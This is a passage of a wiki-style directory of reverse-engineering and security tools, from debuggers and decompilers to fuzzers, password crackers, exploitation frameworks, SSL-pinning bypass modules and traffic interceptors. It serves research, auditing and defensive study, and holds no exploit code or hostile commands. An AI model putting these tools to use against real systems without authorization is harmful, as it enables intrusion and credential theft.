*[https://docs.microsoft.com/en-us/sysinternals/downloads/process-explorer Process Explorer (by Microsoft Sysinternals)] - is an advanced system monitoring tool by Microsoft Sysinternals that provides detailed real-time information about running processes, including their dependencies, resource usage, and open handles or DLLs.

*[https://docs.microsoft.com/en-us/sysinternals/downloads/procmon Process Monitor (by Microsoft Sysinternals)] - is a real-time monitoring tool by Microsoft Sysinternals that captures and displays detailed system activity related to file system, registry, process, and thread operations for advanced troubleshooting and diagnostics.

====Process Dumpers (Windows)====

*[https://github.com/glmcdona/Process-Dump Process Dump (pd)] - is a Windows reverse-engineering tool to dump malware memory components back to disk for analysis. It uses an aggressive import reconstruction approach to make analysis easier, and supports 32 and 64 bit modules. Dumping of regions without PE headers is supported and in these cases PE headers and import tables will automatically be generated.

*[https://github.com/EquiFox/KsDumper KsDumper] - is a tool for dumping processes using the power of kernel space.

====API monitoring ring3 (Windows)====

*[http://jacquelin.potier.free.fr/winapioverride32/ WinAPIOverride] - is an advanced api monitoring software for 32 and 64 bits processes. You can monitor and/or override any function of a process.

*[http://www.rohitab.com/apimonitor Rohitab API Monitor] - is a free tool that lets you monitor and control API calls made by applications and services. Its a powerful tool for seeing how applications and services work or for tracking down problems that you have in your own applications.

*[https://github.com/hasherezade/tiny_tracer tiny_tracer] - is a Pin Tool for tracing API calls including parameters of selected functions, selected instructions RDTSC, CPUID, INT, inline system calls inc parameters of selected syscalls and more.

====Hashing & Crypto====
These tools are used in authorized security audits to uncover flaws in hashing or cryptographic logic, as well as to detect backdoors or undocumented features. They are also commonly employed in crackme challenges to help improve reverse engineering skills. 
It includes support for a wide range of cryptographic algorithms and hash functions, such as AES, Blowfish, TEA family, RC2–RC6, Twofish, DES variants, MARS, and hashing standards like SHA-2, RIPEMD, TIGER, WHIRLPOOL, CRC variants, and HAVAL with multiple rounds and output lengths.

*[https://webscene.ir/distro/AT4RE/Tools Keygener Assistant v2.1.2] [[File:Keygener Assistant v2.1.2.zip]] - is a tool that combines several functions to facilitate the task and save time during the analysis of an algorithm.

*[https://webscene.ir/tools/show/SnD-Reverser-Tool-1.4 SnD Reverser Tool 1.4 (404)] [[File:SnD Reverser Tool 1.4.zip]] - is a cryptographic companion tool designed to support reverse engineering efforts, offering a wide range of features including hash function analysis, base conversions, and support for various encryption standards.

====Password cracking====
Most embedded devices, whether connected via wireless or wired interfaces, store credentials such as local account passwords, service keys, and API keys. If you need to evaluate or audit the cryptographic mechanisms protecting these credentials, password-cracking tools are essential.

Offline
*[https://github.com/hashcat/hashcat Hashcat] - is world's fastest and most advanced password recovery utility, supports many hash algorithms (MD5, SHA1, NTLM, bcrypt, etc).

*[https://github.com/openwall/john John the Ripper jumbo] - is a advanced offline password cracker, which supports hundreds of hash and cipher types, and runs on many operating systems, CPUs, GPUs, and even some FPGAs.

Online (network based bruteforce in LAN).
*[https://github.com/vanhauser-thc/thc-hydra Hydra / THC Hydra] - is a parallelized network login cracker built into various operating systems like Kali Linux, Parrot and other major penetration testing environments. It was created as a proof of concept tool, for security researchers to demonstrate how easy it can be to crack logins.

*[https://github.com/jmk-foofus/medusa Medusa] - is a speedy, parallel, and modular, login brute-forcer.

*[https://github.com/lanjelot/patator Patator] - is a multi-purpose brute-forcer, with a modular design and a flexible usage. Also support various offline brute force methods like; unzip_pass, keystore_pass, umbraco_crack.

====Virtualization technology (host isolation) or sandboxes====

*[https://www.vmware.com/ VMware] - is a virtualization and cloud computing software provider based in Palo Alto, Calif.

*[https://www.virtualbox.org/ Oracle VM VirtualBox] - is a powerful x86 and AMD64/Intel64 virtualization product for enterprise as well as home use. Not only is VirtualBox an extremely feature rich, high performance product for enterprise customers, it is also the only professional solution that is freely available as Open Source Software under the terms of the GNU General Public License (GPL) version 3.

*[https://linux-kvm.org/page/Main_Page KVM (for Kernel-based Virtual Machine)] - is a full virtualization solution for Linux on x86 hardware containing virtualization extensions (Intel VT or AMD-V). It consists of a loadable kernel module, kvm.ko, that provides the core virtualization infrastructure and a processor specific module, kvm-intel.ko or kvm-amd.ko.

*[https://www.qemu.org/ QEMU] - A generic and open source machine emulator and virtualizer.

*[https://www.proxmox.com/en/proxmox-virtual-environment/overview Proxmox] - is a complete, open-source server management platform for enterprise virtualization. It tightly integrates the KVM hypervisor and Linux Containers (LXC), software-defined storage and networking functionality, on a single platform.

*[https://www.redhat.com/en/technologies/cloud-computing/openshift/virtualization Red Hat OpenShift Virtualization] - Red Hat® OpenShift® Virtualization, a feature of Red Hat OpenShift, allows IT teams to run virtual machines alongside containers on the same platform, simplifying management and improving time to production.

*[https://xenproject.org/ Xen Project] - The Xen Project focuses on revolutionizing virtualization by providing a versatile and powerful hypervisor that addresses the evolving needs of diverse industries.

*[https://github.com/firecracker-microvm/firecracker Firecracker] - is an open source virtualization technology that is purpose-built for creating and managing secure, multi-tenant container and function-based services that provide serverless operational models.

*[https://github.com/sandboxie-plus/Sandboxie Sandboxie] - is a sandbox-based isolation software for 32-bit and 64-bit Windows NT-based operating systems. It creates a sandbox-like isolated operating environment in which applications can be run or installed without permanently modifying local & mapped drives or the Windows registry.

*[https://github.com/kpcyrd/boxxy-rs boxxy-rs] - is a linkable sandbox explorer. "If you implement boundaries and nobody is around to push them, do they even exist?". Have you ever wondered how your sandbox looks like from the inside? Tempted to test if you can escape it, if only you had a shell to give it a try?
----

====Dynamic & Static Analysis (mostly '''unmanged''' binaries)====

=====Interactive Disassemblers ('''static analysis''')=====

*[https://binary.ninja/ Binary Ninja] - reverse-engineering platform that can disassemble a binary and display the disassembly in linear or graph views.

::Binary Ninja Scripts/Plugins/Extension
:::*[https://github.com/ergrelet/themida-unmutate-bn themida-unmutate-bn] - a Binary Ninja plugin to deobfuscate Themida, WinLicense and Code Virtualizer 3.x's mutation-based obfuscation.
:::*[https://github.com/ergrelet/themida-spotter-bn themida-spotter-bn] - a Binary Ninja plugin to detect Themida, WinLicense and Code Virtualizer's obfuscated code locations.

*[https://www.nsa.gov/resources/everyone/ghidra/ Ghidra] - Ghidra is an open source software reverse engineering (SRE) framework developed by NSA's [https://www.nsa.gov/what-we-do/research/ Research] Directorate for NSA's [https://www.nsa.gov/what-we-do/cybersecurity/ cybersecurity mission].

::Ghidra Scripts/Plugins/Extension
:::*[https://github.com/AllsafeCyberSecurity/awesome-ghidra Scripts/Plugins/Extension] - A curated list of awesome Ghidra materials.
:::*[https://github.com/grayhatacademy/ghidra_scripts Arm & MIPS scripts] - ARM & MIPS ROP finder, Call Chain, Codatify, Fluorescence, Function Profiler, Leaf Blower, Local Cross Reference, and more.
:::*[https://github.com/DSecurity/efiSeek efiSeek] - is a tool that aids in identifying and analyzing EFI (Extensible Firmware Interface) binaries by locating key EFI structures and metadata within firmware images.
:::*Qt Framework
::::*[https://github.com/diommsantos/QtREAnalyzer/ QtREAnalyzer] - is a extension to reverse-engineer Qt binaries. Works only with Run-Time Type Information (RTTI) enabled & compiled with MSVC.
::::*[https://github.com/OSUSecLab/QtRE QtRE] - is a headless analyzer tailored for Qt binary analysis.

*[https://www.hex-rays.com/products/ida/ IDA] - The IDA Disassembler and Debugger is an interactive, programmable, extensible, multi-processor disassembler hosted on Windows, Linux, or Mac OS X.

::IDA Scripts/Plugins/Extension
:::*[https://github.com/gdelugre/ida-arm-system-highlight IDA ARM] - This script will give you the list of ARM system instructions used in your IDA database. This is useful for locating specific low-level pieces of code (setting up the MMU, caches, fault handlers, etc.).
:::*[https://github.com/google/bindiff BinDiff] - is a Open Source comparison tool for binary files, that assists vulnerability researchers and engineers to quickly find differences and similarities in disassembled code.
:::*[https://www.keystone-engine.org/keypatch/ Keypatch] - A multi-architeture assembler for IDA. Keypatch allows you enter assembly instructions to directly patch the binary under analysis. Powered by Keystone engine.
:::*[https://github.com/onethawt/idastealth IDAStealth] - is a plugin which aims to hide the IDA debugger from most common anti-debugging techniques. The plugin is composed of two files, the plugin itself and a dll which is injected into the debugger as soon as the debugger attaches to the process.
:::*[https://github.com/iphelix/ida-sploiter ida-sploiter] - is a exploit development and vulnerability research tool. Some of the plugin's features include a powerful ROP gadgets search engine, semantic gadget analysis and filtering, interactive ROP chain builder, stack pivot analysis, writable function pointer search, cyclic memory pattern generation and offset analysis, detection of bad characters and memory holes, and many others.
:::*[https://github.com/danigargu/IDAtropy IDAtropy] -is a plugin for Hex-Ray's IDA Pro designed to generate charts of entropy and histograms using the power of idapython and matplotlib
:::*[https://github.com/grayhatacademy/ida/tree/master/plugins/localxrefs Localxrefs] - Finds references to any selected text from within the current function.
:::*[https://github.com/a1ext/labeless Labeless] - is a plugin system for dynamic, seamless and realtime synchronization between IDA Database and Olly. Labels, function names and global variables synchronization is supported. Olly and x64dbg are supported.
:::*[https://www.coresecurity.com/core-labs/open-source-tools/turbodiff-cs Turbodiff] - is a binary diffing tool developed as an IDA plugin. It discovers and analyzes differences between the functions of two binaries.
::::*Oreans CV scripts
:::::*[[Media:Oreans anti debug blacklist identifier.zip]] - [Python script] Oreans - Anti-Debugger Blacklist Identifier; Tested on 2.3.0.0 - 2.4.6.0.
:::::*[[Media:Oreans macro entry identifier biased.zip]] - [Python script] Oreans - Macro Entry Identifier (Biased); Tested on 2.3.0.0 - 3.0.8.0.
:::::*[[Media:Oreans macro entry identifier reversal.zip]] - [Python script] Oreans - Macro Entry Identifier (Reversal); Tested on 2.3.0.0 - 3.0.8.0.
:::*[https://github.com/onethawt/idaplugins-list A list of IDA Plugins PART1 (click here for more)] - A large list/collection of plugins for IDA.
:::*[https://github.com/vmallet/ida-plugins A list of IDA Plugins PART2 (click here for more)] - A large list/collection of plugins for IDA.
:::*[https://github.com/fr0gger/awesome-ida-x64-olly-plugin A list of IDA Plugins PART3 (click here for more)] - A large list/collection of plugins for IDA.
::IDA LLM Plugins
:::*Local (quantized LLMs Q4/INT4)
::::*[https://github.com/atredispartners/aidapal aiDAPal] - is an IDA Pro plugin that uses a locally running LLM that has been fine-tuned for Hex-Rays pseudocode to assist with code analysis.
::::*[https://github.com/0xdea/oneiromancer oneiromancer] - is a reverse engineering assistant that uses a locally running LLM to aid with pseudo-code analysis.
:::*Cloud
::::*[https://github.com/JusticeRage/Gepetto Gepetto] - is a Python plugin which uses various large language models to provide meaning to functions decompiled by IDA Pro (≥ 7.4). It can leverage them to explain what a function does, and to automatically rename its variables.
::::*[https://github.com/Antelcat/ida_copilot ida_copilot] - is a ChatGPT plugin for IDA Pro, where the cutting-edge capabilities of OpenAI's GPT models meet the powerful disassembly and debugging features of IDA Pro.
::::*[https://github.com/ke0z/VulChatGPT VulChatGPT] - is an plugin for Hex-Rays decompiler which integrates with the OpenAI API (ChatGPT) to assist in vulnerability discovery during reverse-engineering.
::::*[https://github.com/RevEngAI/reai-ida RevEng.AI] - is a plugin by RevEng.AI that integrates with their AI-driven analysis platform to let you upload binaries, fetch semantic summaries, auto‑rename functions based on similar binaries, sync analyses, and even perform AI‑based decompilation.

*[https://codisec.com/veles/ Veles] - Open source tool for binary data analysis (No longer actively developed).

*[https://github.com/uxmal/reko Reko] - Reko is a binary decompiler for static analysis (ARM, x86-64, M68K, Aarch65, RISC-V and dotnet)

*[https://rada.re/ radare2] and [https://rizin.re/ Rizin] - radare2 and its fork Rizin are open source reverse engineering frameworks. Both are primarily used through a shell-like text UI, but also offer GUIs called [https://rada.re/n/iaito.html iaito] and [https://cutter.re/ Cutter] respectively.

*[https://github.com/rizinorg/cutter Cutter] - is a free and open-source reverse engineering platform powered by rizin. It aims at being an advanced and customizable reverse engineering platform while keeping the user experience in mind. Cutter is created by reverse engineers for reverse engineers.

*[https://github.com/joelpx/plasma Plasma] - Plasma is an interactive disassembler for x86/ARM/MIPS. It can generates indented pseudo-code with colored syntax.

*[https://github.com/wisk/medusa Medusa] - is a disassembler designed to be both modular and interactive. It runs on Windows and Linux, it should be the same on OSX.

*[https://github.com/capstone-engine/capstone Capstone] - is a disassembly/disassembler framework for ARM, ARM64 (ARMv8), BPF, Ethereum VM, M68K, M680X, Mips, MOS65XX, PPC, RISC-V(rv32G/rv64G), SH, Sparc, SystemZ, TMS320C64X, TriCore, Webassembly, XCore and X86.

=====Active Disassemblers or Debuggers ('''dynamic analysis''')=====

*[https://github.com/vivisect/vivisect Vivisect] - Vivisect binary analysis framework. Includes Disassembler, Debugger, Emulation and Symbolik analysis engines. Includes built-in Server and Shared-Workspace functionality. Runs interactive or headless, programmable, extensible, multi-processor disassembler hosted on Windows, Linux, or Mac OS X (Pure-Python, using ctypes to access underlying OS debug mechanism). Supports RevSync via plugin, allowing basic collaboration with Binja, Ghidra, and IDA. Criticisms (from a core dev): "Graph View could use some work, slower than Binja and IDA (due to Python), documentation like an OpenSource Project... but we keep working to make it better. PR's and suggestions welcome." Best installed via Pip: <code>python3 -m pip install vivisect</code>

*[https://www.immunityinc.com/products/debugger/ Immunity Debugger] - is a powerful new way to write exploits, analyze malware, and reverse engineer Windows binary files (python support)

*[https://www.hopperapp.com/ Hopper] - Hopper can use LLDB or GDB, which lets you debug and analyze the binary in a dynamic way (only for Mac and Linux hosts, not for mobile devices).

*[https://www.ollydbg.de/ OllyDbg] - is a powerful, user-friendly 32-bit Windows debugger focused on binary analysis, reverse engineering, and malware research, featuring dynamic code analysis and a rich plugin ecosystem.

::OllyDbg Scripts/Plugins/Mods
:::*[https://github.com/ThomasThelen/OllyDbg-Scripts OllyDbg-Scripts] - is a curated list containing many older x86 OllyDbg scripts.

*[https://x64dbg.com/ x64dbg] - Is a powerful Open Source Ollydbg replacement with a User Interface very similar to Ollydbg also x64dbg as the name states offers x64 support.

::x64dbg Plugins/Integrations/Templates
:::*[https://github.com/x64dbg/x64dbg/wiki/Plugins x64dbg's Wiki] - is a wiki of Integrations and Plugins of x64dbg debugger.
:::*[[Media:Oreans oep finder uni.zip]] - OEP Finder python script (Universal=works for "all" versions); Tested on 2.3.0.0, 2.3.5.10, 3.0.8.0.

*[https://github.com/mandiant/rvmi rVMI] - is a debugger on steroids. It leverages Virtual Machine Introspection (VMI) and memory forensics to provide full system analysis. This means that an analyst can inspect userspace processes, kernel drivers, and pre-boot environments in a single tool.

*[https://www.sourceware.org/gdb/ GDB] - the GNU Project debugger, allows you to see what is going on `inside' another program while it executes, or what another program was doing at the moment it crashed.

::GDB Plugins/Integrations/Templates
:::*[https://github.com/pwndbg/pwndbg pwndbg] - is a GDB plug-in that makes debugging with GDB suck less, with a focus on features needed by low-level software developers, hardware hackers, reverse-engineers and exploit developers.

*[https://github.com/eteran/edb-debugger edb] - is a cross platform AArch32/x86/x86-64 debugger. It was inspired by Ollydbg, but aims to function on AArch32, x86, and x86-64 as well as multiple OS's.

====Debugging and Profiling dynamic analysis (Linux)====

*[https://valgrind.org/ Valgrind] - is a GPL'd system for debugging and profiling Linux programs. With Valgrind's tool suite you can automatically detect many memory management and threading bugs, avoiding hours of frustrating bug-hunting, making your programs more stable.

*[https://libcsdbg.sourceforge.net/jTracer/ jTracer] - is a stack trace visualization utility for libcsdbg. In other words, it acts as a TCP/IP server for libcsdbg clients, that connect to it and transfer their trace data, either C++ exception stack traces or generic thread stack traces and whole process stack dumps.

*[https://github.com/koute/bytehound Bytehound] - is a memory profiler tool for Linux designed to help developers analyze memory usage and find leaks in their applications.

*[https://github.com/strace/strace strace] - is a diagnostic, debugging and instructional userspace utility for Linux.

*[https://github.com/rr-debugger/rr rr Record and Replay Framework] - is a lightweight tool for recording, replaying and debugging execution of applications (trees of processes and threads). Debugging extends gdb with very efficient reverse-execution, which in combination with standard gdb/x86 features like hardware data watchpoints, makes debugging much more fun.

*[https://github.com/lornix/fenris fenris] - is a program execution path analysis tool suitable for black-box code audits and algorithm analysis. It's useful for tracking down bugs and evaluating security subsystems.

====Debuggers / Disassemblers / Decompilers for '''managed''' binaries====

=====.NET (CLR)=====

*[https://github.com/dnSpyEx/dnSpy dnSpyEx (newly maintained repo & '''added features''')] - is a debugger and .NET assembly editor. You can use it to edit and debug assemblies even if you don't have any source code available.
*[https://github.com/dnSpy/dnSpy dnSpy (archived repo)] - is a debugger and .NET assembly editor. You can use it to edit and debug assemblies even if you don't have any source code available.
*[https://github.com/icedland/iced Iced] - Blazing fast and correct x86/x64 disassembler, assembler, decoder, encoder for Rust, .NET, Java, Python, Lua.
*[https://github.com/icsharpcode/ILSpy ILSpy] - NET Decompiler with support for PDB generation, ReadyToRun, Metadata (&more) - cross-platform!
*[https://www.telerik.com/products/decompiler.aspx Telerik JustDecompile] - is a free .NET decompiler and assembly browser that makes high-quality .NET decompilation easy With an open source decompilation engine.

======.NET deobfuscators======

::*[https://github.com/ViRb3/de4dot-cex de4dot CEx] - is a deobfuscator based on de4dot with full support for vanilla ConfuserEx.
::*[https://github.com/de4dot/de4dot de4dot] - is a .NET deobfuscator and unpacker.
::*[https://github.com/NotPrab/.NET-Deobfuscator Lists of .NET deobfuscators and unpackers (Open Source)] - A curated list of open source deobfuscators and more.

======.NET memory dumpers======

::*[https://github.com/wwh1004/ExtremeDumper ExtremeDumper] - is a .NET Assembly Dumper (source code available).
::*[https://github.com/fremag/MemoScope.Net MemoScope.Net] - is a tool to analyze .Net process memory: it can dump an application's memory in a file and read it later. The dump file contains all data (objects) and threads (state, stack, call stack).
::*[https://github.com/0x410c/ClrDumper ClrDumper] - is a tool that can dump .NET assemblies and scripts from native clr loaders, managed assembly and vbs, jscript or powershell scripts.

======.NET tracers======

::*[https://web.archive.org/web/20150515023954/http://www.reteam.org/board/showthread.php?t=939 dotNET Tracer 2.0 by Kurapika] - is a simple tool that has a similar functionality to RegMon or FileMon but it's designed to trace events in .NET assemblies in runtime. [[Media:KDT2.0.zip]] [https://www.virustotal.com/gui/file/d29afcc5115c28f9892f7a6d249423374ad77ac86f69b316665c347982975d02 VT1] [https://www.virustotal.com/gui/file/04cd51dbbc3d2b4fe4a721e4ad0c2f3012fe0f409dc902b430207ea25561ff8c VT2] (thermida packed), pw: recessim.com
::*[https://github.com/smourier/TraceSpy TraceSpy] - is a open source and free, alternative to the very popular SysInternals DebugView tool.

=====JAVA (JVM) Decompilers=====

:*[https://github.com/Col-E/Recaf Recaf] - Recaf is an open-source Java bytecode editor that simplifies the process of editing compiled Java applications.
:*[https://www.pnfsoftware.com/ JEB decompiler] - Decompile and debug Android dalvik, Intel x86, ARM, MIPS, RISC-V, S7 PLC, Java, WebAssembly & Ethereum Decompilers.

======JAVA (ART/APK)======
The tooling you need for Android application reverse engineering of the Java virtual machine bytecode. Traditional Java Virtual Machine (JVM) and Android Runtime (ART) that utilizes AOT compilation over JIT.

:*[https://github.com/skylot/jadx Jadx] - Dex to Java decompiler. Command-line and GUI tools for producing Java source code from Android Dex and apk files.
:*[https://github.com/honeynet/apkinspector/ APKinspector] - is a powerful GUI tool for analysts to analyze the Android applications.
:*[https://apktool.org/ Apktool] - A tool for reverse engineering Android apk files.
:*[https://github.com/androguard/androguard Androguard] - is a full python tool to play with Android files. DEX, ODEX; APK; Android's binary xml; Android resources; Disassemble DEX/ODEX bytecodes.
:*[https://github.com/Konloch/bytecode-viewer Bytecode viewer] - is a Java 8+ Jar & Android APK Reverse Engineering Suite (Decompiler, Editor, Debugger & More)
:*[https://github.com/niranjan94/show-java ShowJava] - is an APK (android application), JAR & Dex decompiler for android.
:*[https://github.com/tp7309/TTDeDroid TTDeDroid] - is a tool for quickly decompiling apk/aar/dex/jar.
:*[https://github.com/JesusFreke/smali smali/baksmali] - is an assembler/disassembler for the dex format used by dalvik, Android's Java VM implementation. The syntax is loosely based on Jasmin's/dedexer's syntax.

======RASP (Runtime Application Self-Protection) Android======
To effectively audit applications, testers often intentionally make their devices vulnerable to simplify testing. 
In response, application developers implement countermeasures such as detecting emulators, debuggers, and checking if the device is secure and not rooted. 
The current focus of this technology is on the vulnerabilities of Java and .NET platforms.
:*[https://arxiv.org/pdf/2312.17726 arXiv:2312.17726 (cs.CR)] - is a paper regarding Interactive Application Security Testing (IAST) and RASP Tools.
:*[https://github.com/securevale/android-rasp Android-RASP] - is a solution for protecting Android apps against being run on vulnerable devices.

======JAVA deobfuscators (mixed platforms)======
There is nothing more annoying than coroutines (ProGuard), c-flow, function virtualization, class and name renaming and junk code while decompiling code. Here are a few off the shelf deobfuscators.

:*[https://github.com/CalebFenton/simplify simplify] - Android virtual machine and generic deobfuscator.
:*[https://github.com/java-deobfuscator/deobfuscator deobfuscator] - is a project that aims to deobfuscate most commercially-available obfuscators for Java. [https://github.com/java-deobfuscator/deobfuscator-gui GUI version github]
:*[https://github.com/GraxCode/threadtear Threadtear] - is a multifunctional deobfuscation tool for java, ZKM and Stringer support, Android support is in development.
:*[https://github.com/narumii/Deobfuscator Another Deobfuscator] - Some deobfuscator for java. Supports superblaubeere27 / JObf / sb27, Paramorphism 2.1.2_9, Caesium, Monsey, Skid/qProtect, Scuti, CheatBreaker, Bozar, ...

======JAVA decompilers (platform independent)======
:*[https://github.com/fesh0r/fernflower Fernflower] - is a powerful open-source Java decompiler that reconstructs readable Java source code from compiled bytecode, widely used and integrated into IntelliJ IDEA.

====Debuggers / Disassemblers for '''unmanaged''' binaries====

=====AutoIt=====
AutoIt decompilers extract or anything else related to reverse engineering AutoIt binaries.
:*[https://github.com/JacobPimental/exe2aut exe2aut] - is a tool that converts executable (.exe) files into AutoIt script (.aut) source code, attempting to reverse-engineer compiled AutoIt programs.
:*[https://github.com/nazywam/AutoIt-Ripper AutoIt-Ripper] - is a short python script that allows for extraction of "compiled" AutoIt scripts from PE executables.

=====VB6=====
Early .NET applications compile native and p-code meaning there is not a easy way to decompile these like with newer .NET framework exectables.
:*[https://www.vb-decompiler.org/ VB Decompiler Pro] - is a commercial software tool that decompiles and analyzes programs written in Visual Basic 5.0/6.0 and also .NET for reverse engineering and code recovery purposes.

====Bytecode Decompilers====

=====React Native Hermes=====
If you plan on looking inside a compiled React Native Asset for doing a security audit, these tools come in handy.

:*[https://github.com/P1sec/hermes-dec hermes-dec] - A reverse engineering tool for decompiling and disassembling the React Native Hermes bytecode.
:*[https://github.com/Pilfer/hermes_rs hermes_rs] - Bytecode disassembler and assembler.
:*[https://github.com/bongtrop/hbctool hbctool] - Hermes Bytecode Reverse Engineering Tool (Assemble/Disassemble Hermes Bytecode).

=====Python=====
To reverse or decompile binaries generated by IronPython, which compiles Python code into Common Intermediate Language (CIL) targeting the Common Language Infrastructure (CLI), you should use decompilation tools designed for managed assemblies rather than traditional Python bytecode tools.
:*[https://github.com/rocky/python-uncompyle6 uncompyle6] - is a native Python cross-version decompiler and fragment decompiler. The successor to decompyle, uncompyle, and uncompyle2.
:*[https://github.com/zrax/pycdc pycdc] - is a C++ python bytecode disassembler and decompiler.
:*[https://github.com/Cisco-Talos/pyrebox PyREBox] - is a Python scriptable Reverse Engineering sandbox by Cisco-Talos. It is based on QEMU, and its goal is to aid reverse engineering by providing dynamic analysis and debugging capabilities from a different perspective.
:*[https://github.com/snare/voltron Voltron] - is an extensible debugger UI toolkit written in Python. It aims to improve the user experience of various debuggers (LLDB, GDB, VDB and WinDbg) by enabling the attachment of utility views that can retrieve and display data from the debugger host.

=====Lua=====
:*[https://github.com/scratchminer/unluac unlua] - is a decompiler that converts compiled Lua 5.1 bytecode files (.luac) back into readable Lua source code.

----

====Fuzzers====

*[https://github.com/google/honggfuzz Honggfuzz] - Security oriented software fuzzer. Supports evolutionary, feedback-driven fuzzing based on code coverage (SW and HW based).

*[https://llvm.org/docs/LibFuzzer.html LibFuzzer] - LibFuzzer is an in-process, coverage-guided, evolutionary fuzzing engine.

*[https://github.com/google/AFL '''(ARCHIVED)''' AFL (American fuzzy lop)] - is a security-oriented fuzzer that employs a novel type of compile-time instrumentation and genetic algorithms to automatically discover clean, interesting test cases that trigger new internal states in the targeted binary.

*[https://github.com/AFLplusplus/AFLplusplus AFL++ (AFLplusplus)] - The fuzzer afl++ is afl with community patches, qemu 5.1 upgrade, collision-free coverage, enhanced laf-intel & redqueen, AFLfast++ power schedules, MOpt mutators, unicorn_mode, and a lot more!

*[https://github.com/carolemieux/afl-rb FairFuzz] - is a AFL extension to increase code coverage by targeting rare branches. FairFuzz has a particular advantage on programs with highly nested structure (packet analyzers, xmllint, programs compiled with laf-inte, etc).

*[https://github.com/RUB-SysSec/redqueen RedQueen] - is a fast general purpose fuzzer for x86 binary applications. It can automatically overcome checksums and magic bytes without falling back to complex and fragile program analysis techniques, such as symbolic execution.

*[https://github.com/sslab-gatech/qsym '''(ARCHIVED)''' QSYM] - ia a Practical Concolic Execution Engine Tailored for Hybrid Fuzzing.

*[https://github.com/puppet-meteor/MOpt-AFL MOpt-AFL] - is a AFL-based fuzzer that utilizes a customized Particle Swarm Optimization (PSO) algorithm to find the optimal selection probability distribution of operators with respect to fuzzing effectiveness. More details can be found in the technical report. The installation of MOpt-AFL is the same as AFL's.

====PC platform exploration frameworks====

*[https://github.com/chipsec/chipsec Chipsec] - is a framework for analyzing the security of PC platforms including hardware, system firmware (BIOS/UEFI), and platform components. It includes a security test suite, tools for accessing various low level interfaces, and forensic capabilities.

*[https://github.com/rapid7/metasploit-framework Metasploit Framework] - is a Ruby-based Framework, modular penetration testing platform that enables you to write, test, and execute exploit code.

*[https://github.com/BC-SECURITY/Empire Empire] - is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.

*[https://github.com/Arachni/arachni Arachni] - is a feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications.

*[https://portswigger.net/burp Burp Suite] - Burp or Burp Suite is a set of tools used for penetration testing of web applications.

====Mobile exploration frameworks====

*[https://github.com/MobSF/Mobile-Security-Framework-MobSF MobSF] - Mobile Security Framework (MobSF) is an automated, all-in-one mobile application (Android/iOS/Windows) pen-testing, malware analysis and security assessment framework capable of performing static and dynamic analysis.

*[https://frida.re/ Frida] - Dynamic instrumentation toolkit for developers, reverse-engineers, and security researchers.

*[https://github.com/sensepost/objection objection] - is a runtime mobile exploration toolkit, powered by Frida, built to help you assess the security posture of your mobile applications, without needing a jailbreak.

*[https://github.com/xtiankisutsa/MARA_Framework MARA] - is a Mobile Application RE and Analysis Framework. It is a toolkit that puts together commonly used mobile application RE and analysis tools to assist in testing mobile applications against the OWASP mobile security threats.

*[https://github.com/EntySec/SeaShell SeaShell] - is an iOS post-exploitation framework that enables you to access the device remotely, control it and extract sensitive information.

*[https://github.com/mingyuan-xia/AppAudit AppAudit] - is an efficient program analysis tool that detects data leaks in mobile applications. It can accurately find all leaks within seconds and ~200 MB memory.

*[https://github.com/canyie/pine Pine] - is a dynamic java method hook framework on ART runtime, which can intercept almost all java method calls in the current process.

*[https://github.com/LSPosed/LSPlant LSPlant] - is an Android ART hook library, providing Java method hook/unhook and inline deoptimization.

*[https://github.com/LSPosed/LSPosed LSposed] - is a Riru / Zygisk module trying to provide an ART hooking framework which delivers consistent APIs with the OG Xposed, leveraging LSPlant hooking framework.

::LSPosed Module Repository
:::*[https://github.com/Xposed-Modules-Repo Xposed Modules Repo] - New Xposed(LSPosed) Module Repository.

*[https://github.com/ElderDrivers/EdXposed Xposed Framework] - is a framework for mobile exploration hooking and modifying code on the fly. [https://binderfilter.github.io/xposed/ Inline API hooking example].

::Xposed modules
:::*[https://github.com/Fuzion24/JustTrustMe JustTrustMe] - Art framework hook to patch okHTTP and other common libs to fool the CERT chain in order for Mitmproxy to capture TLS traffic in cleartext.
:::*[https://github.com/sanfengAndroid/FakeXposed FakeXposed] - Hide xposed, root, file redirection, two-way shielding data detection.
:::*[https://github.com/ac-pm/SSLUnpinning_Xposed/ SSLUnpinning_Xposed] - Android Xposed Module to bypass SSL certificate validation (Certificate Pinning)..

::Xposed Framework API Development Documentation
:::*[https://api.xposed.info/reference/packages.html Xposed API Reference] - Javadoc reference of the Xposed Framework API. It's meant for module developers who want to understand which classes and methods they can use.

====Network Inspection====

=====Promiscuous mode eavesdropping TCP/UDP=====

::*[https://github.com/mitmproxy/mitmproxy Mitmproxy] - is an interactive TLS-capable intercepting HTTP proxy for penetration testers and software developers.

::*[https://gitlab.com/wireshark/wireshark Wireshark] - is a network traffic analyzer, or "sniffer", for Linux, macOS, *BSD and other Unix and Unix-like operating systems and for Windows.

::*[https://github.com/zaproxy/zaproxy Zed Attack Proxy (ZAP)] - is an Open Source & easy to use integrated penetration testing tool for finding vulnerabilities in web applications.

::*[https://github.com/SensePost/Mallet Mallet] - is an intercepting proxy for arbitrary protocols.

::*[https://github.com/Warxim/petep PETEP (PEnetration TEsting Proxy)] - is an open-source Java application for traffic analysis & modification using TCP/UDP proxies. PETEP is a useful tool for performing penetration tests of applications with various application protocols.

=====HTTP(S) Debuggers / Web Debuggers=====

::*[https://portswigger.net/burp Burp Suite] - is a proxy tool which helps to view, interact, modify web requests. Test, find, and exploit vulnerabilities faster with a complete suite of security testing tools.

::*[https://www.httpdebugger.com/ HTTP Debugger Pro] - is a network traffic analyzer tool that captures, displays, and analyzes HTTP and HTTPS traffic between a web browser or application and the internet for debugging and testing purposes.

::*[https://github.com/httptoolkit HTTP Toolkit] - is a beautiful, cross-platform & open-source HTTP(S) debugging proxy, analyzer & client, with built-in support for modern tools from Docker to Android to GraphQL.

::*[https://github.com/jbittel/httpry httpry] - is a HTTP logging and information retrieval tool written in Perl and C.

::*[https://github.com/requestly/requestly Requestly] - Bring the power of Charles Proxy, Fiddler & Postman together with beautiful, modern UI & collaboration features.

::*[https://telerik-fiddler.s3.amazonaws.com/fiddler/FiddlerSetup.exe Fiddler] - is a Web Debugger is a serviceable web debugging proxy for logging all HTTP(S) traffic linking your computer and the internet, allowing for traffic inspection, breakpoint setting, and more.

=====Other Network Tools=====

::*[https://learn.microsoft.com/en-us/sysinternals/downloads/tcpview tcpview] - is a tool that will enumerate all active TCP and UDP endpoints, resolving all IP addresses to their domain name versions (Windows).

